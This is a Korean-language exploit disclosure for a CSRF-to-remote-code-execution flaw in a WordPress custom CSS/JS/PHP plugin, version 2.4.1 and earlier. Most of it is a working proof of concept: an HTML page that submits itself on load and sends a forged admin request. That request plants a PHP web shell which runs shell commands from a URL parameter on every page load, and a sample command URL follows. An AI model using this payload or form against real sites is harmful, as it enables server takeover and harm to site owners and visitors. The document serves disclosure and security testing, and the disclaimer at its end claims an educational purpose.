
WordPress Custom CSS, JS & PHP 플러그인 <= 2.4.1 - CSRF로 인한 RCE 취약점
WPFactory Custom CSS, JS & PHP 플러그인의 사이트 간 요청 위조(CSRF) 취약점으로 인해 승인되지 않은 POST 요청을 통해 악성 PHP 코드를 주입하여 **원격 코드 실행(RCE)**이 가능합니다.
이는 2.4.1 이하의 모든 버전에 영향을 미칩니다.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H아래는 성공적인 악용 결과를 보여주는 스크린샷으로, URL 매개변수를 통해 원격 코드가 어떻게 실행될 수 있는지 보여줍니다:


<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
<h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
<p>By : Nxploited | Khaled Alenazi</p>
<form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
<input type="hidden" name="alg_custom_css_php_enabled" value="1">
<input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
<input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
<input type="hidden" name="alg_ccjp_submit" value="php">
<noscript><input type="submit" value="Submit"></noscript>
</form>
</body>
</html>
plugins_loaded 훅을 통해 모든 페이지 로드 시 자동으로 실행됩니다.http://target-site.com/?cmd=whoami
이 PoC는 교육 목적으로만 제공됩니다.
저자는 이 정보를 부적절하게 사용하여 발생하는 오용이나 손해에 대해 책임을 지지 않습니다.
항상 통제된 환경에서 허가를 받고 테스트하십시오.
작성자: Nxploited | Khaled Alenazi